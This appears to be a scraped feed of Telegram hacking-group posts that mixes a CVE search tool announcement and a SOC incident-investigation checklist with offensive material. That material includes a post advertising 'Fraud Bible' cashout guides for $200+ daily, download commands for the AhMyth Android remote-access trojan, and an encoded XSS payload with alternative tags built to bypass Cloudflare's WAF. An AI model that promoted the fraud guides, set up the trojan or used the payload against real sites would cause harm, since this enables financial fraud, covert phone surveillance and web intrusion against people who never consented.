Termux All Command [Telegram Group]

We've been using this for while to actively monitory new CVE's that are being published, exploited and getting reported to make informed decisions for CVEs to go after for our research team, similarly it can be used to prioritize diffreent workflow depending on what CVE's means for your use case! Today, we are publishing CVEMap to easily query, browse and search through CVE and multiple datapoints associated with it, let me what you think about it or what could be done to improve this further? Read the release blog here - https://lnkd.in/gmA-_PEp GitHub project - https://lnkd.in/gBdsDfXA #release #opensource #cvemap

online tools to identify a location from an uploaded photo using AI: geospy.web.app (free + paid PRO version) usersearch.org (paid) huggingface.co/spaces/ydshieh/Kosmos-2 (free) picarta.ai (free trial) labs.tib.eu/geoestimation/ (free)

Blackhat Methods - 10+ FREE Guides - Cashout $200+ Daily Using Fraud Methods from Fraud Bible ✖️size :- 3gb+ ▪️Mega link :- https://mega.nz/folder/J1gGSTjL#BB1Px1t8hdOYd7diqHawbg

🎭 RECON FOR ETHICALHACKING ~ BUGBOUNTY 🎭 🔋 Shodan for bug bounty 🔋 Scope expansion 🔋 Dns enumeration 🔋 Cms identification 🔋 WAF identification 🗃️ Link - https://mega.nz/folder/UewD3SpA#9wrVrLz-DEUS9MDRvr96jQ

🎭 Vikas Chaudhary Bug Bounty Hunting - Offensive Approach to Hunt Bugs 🎭 🔋 Free Download 🔋 Size - 7.39 GB 🔋 189 Files And 21 SubFolders 🗃️ Link - https://mega.nz/folder/Ro9zna5I#BwWk-iQnI8JjGTIahNQUpQ 🎁 Share Us For More - @PakistanCyberHunters

A Beginner's Guide to Install Ahmyth from Binary in Kali Linux

apt install openjdk-11-jdk openjdk-11-jre sudo update-alternatives --config java [select 1] wget https://github.com/Morsmalleo/AhMyth/releases/download/v1.0-beta.5a/AhMyth-Setup_amd64.deb apt install ./AhMyth-Setup_amd64.deb

both are same working but which is fast?? Is it Know?

How To Develop The Pentesting Eye To Look Vulnerability in Application: When You are Pentesting Confusion always begins With only 1 part - Where to look for { Vuln } in the application? Increase with the load of: 1. Overwhelming Features 2. Improper Mention of Scope 3. Constant pressure of Deadlines Here's How To Develop Pentester's Eye: Attack: XSS Commonly Found: - Search Bar - Contact Form - Comment Section Attack: IDOR Commonly Found: - Checkout Page - Product Page - Profile Page Attack: SSRF Commonly Found: - External API Request - Webhooks All of this can only be built And developed with 3 Non-Technical Skills - Consistency - Discipline - Patience ____ That's it! ____ TL;DR Develop the Pentesters Eye With This Framework Attack: { Name } Commonly Found: - Place 1 - Place 2 - Place 3 ____ Join the journey of becoming a Self-Employed AppSec Engineer With me Sundaraman Iyer 🔔 in a fun philosophical way ____ P.S: A simple common advice Play Bug Bounty At night Earn Your Respect Earn Your T-shirt Earn Your Pride ~ Reminder To Self

bypassing WAF :https://medium.com/@nishadbabu1015/bypassing-waf-42efc4ba1963

HOW TO INVESTIGATE PART 1 🔍 Phishing Emails Alert: 1- Check Email Headers (SPF, DKIM, Message-ID, Sender && Return-path) 2- Inspect Email content 3- Verify SMTP IP in Virustotal, AbuseIPDB, X-Force, Talos intelligence 4- Investigate Attachments at Virustotal, urlscan, Any.run, joesandbox, Hybrid-Analysis ↪ Note: If Attachment is a domain, check registration time 5- Confirm if the user opened the Attachment ✍ https://lnkd.in/dfscKs4n ✍ https://lnkd.in/dSMs5Tqx ✍ https://lnkd.in/d5sXYis3 ✍ https://lnkd.in/d3VS3trE. 🦠 Malware Investigation: 1- Check File hash in threat intelligence 2- AV Action, ensure not deleted/cleaned/quarantined; create L2 ticket if needed 3- Examine File path to determine device infection source 4- Check Malware category - Contact user for known results like Ransomware ✍ https://lnkd.in/dpZdSziE ✍ https://lnkd.in/dBevZUmj 🤖 Brute Force Analysis: 1- Determine login operation origin (local or remote) by checking Source IP 2- Inspect destination IP/Service to identify targeted service 3- Review Logon Type to understand login method 4- Analyze Login Failure Reason to verify user legitimacy 5- Check IDS/IPS & WAF Logs for automation tool usage 6- Confirm successful or unsuccessful login ⚔ DoS/DDoS Attack Alert: 1- Check source IP(s) to determine local or remote origin ↪Note: If remote, check threat intelligence; if local, create L2 ticket to check the host 2- Verify if Destination IP still operational manually 3- Run "netstat -an" command for strange connections 4- Run ping command to detect dropped packets ✍ DDOS: https://lnkd.in/eQ7zZzVt ✍ MaliciousNetworkBehaviour: https://lnkd.in/ewVZy2cs 🚫 Proxy Logs Investigation (Communication to bad IP/domain): 1- Check Proxy Category to determine domain type 2- Review device action 3- Examine Destination IP/domain at AbuseIPDB, Virustotal, urlscan ↪Note: For a domain, check registration time 4- Confirm Destination Port 5- Check User-agent 6- Verify Bytes Sent && Bytes Received 7- Inspect request method 8- Scrutinize Referer Header 9- Validate Content-Type Header ↪Note: Detection also possible through SIEM Graph 📊 Windows Event Log Analysis (Login & Logout): 1- Check event id/name 2- Verify login type to understand login method 3- Confirm workstation for DNS Name 4- Review status and sub-status for failure ✍ https://lnkd.in/dpVJRJmY ✍ https://lnkd.in/d7ABVqjw ✍ https://lnkd.in/dgJfKpz2 🛑 Unknown Process Installation Investigation: 1- Check process name for anomalies 2- Examine process id to identify parent or child process ↪Note: If a child process, check creator process id to identify the parent process 3- Confirm creator process name to determine the process path 4- Check process hash in threat intelligence 5- Verify token elevation to understand the user's app privilege

XSS bypass Cloudflare WAF 🧱 Encoded Payload: &#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt; Original Payload: "><track/onerror='confirm1'> HTML entity and URL encoding: " --> &#34; > --> &gt; < --> &lt; ' --> &#x27; ` --> \%60 BONUS: (You can change "track" to): audio embed input source track video object frame applet

Deep and Dark Web Monitoring (OSINT) : https://send.cm/d/qg6B

SQLI : https://drive.google.com/drive/folders/1xoUUDsvwZHStU9me_rQC7GvJejY5hVBH